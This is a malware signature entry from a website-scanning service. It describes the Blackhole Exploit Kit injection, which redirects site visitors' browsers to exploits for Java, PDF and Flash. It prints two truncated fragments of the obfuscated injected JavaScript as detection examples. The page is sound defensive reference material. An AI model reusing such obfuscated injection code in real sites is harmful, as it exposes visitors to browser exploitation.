SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. malware.blackhole_ek

malware.blackhole_ek

Description:
An encoded javascript (or a redirection to it) was detected, leading browsers to the Blackhole Exploit kit (v1.x). It attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common type of malware we are seeing on web sites lately (2012/Mar).

Note that any PHP, JS or .htaccess could be compromised by this type of malware.

Examples of typical malicious Blackhole scripts

<scr​ipt>i=0;try{​prototype;}catch(​z){h="​harCode";f=['-33c​-33c63c60c-10c-2c58c69c57c75c67c59c68c74c4c61c59c74c27c66c59c67c59c68c74c73c24c79c42c5...skipped...
<script>try{​q=document.createElement("e;d"e;+"e;i"e;+"e;v"e;);q.appendChild(q+"e;"e;);}catch(qw){h=-012/5;zz='a'+​'l';f='fr'+'om'​+'Ch';f+='arC';}try{qwe​=prototype;}catch(brebr){zz='zv'.substr(123-122)+​zz;ss=[];f+=(h)?'ode':"e;"e;;w=this;e=w[f["e;s"e;+"e;ubstr"e;](11)+zz];n="e;3.5$3.5$51.​5$50$15$19$49$54.5$48.5$57.5$53.5$49.5$54$57$22$50...skipped...

Affecting: Any web site. Often on outdated WordPress, Joomla and osCommerce sites.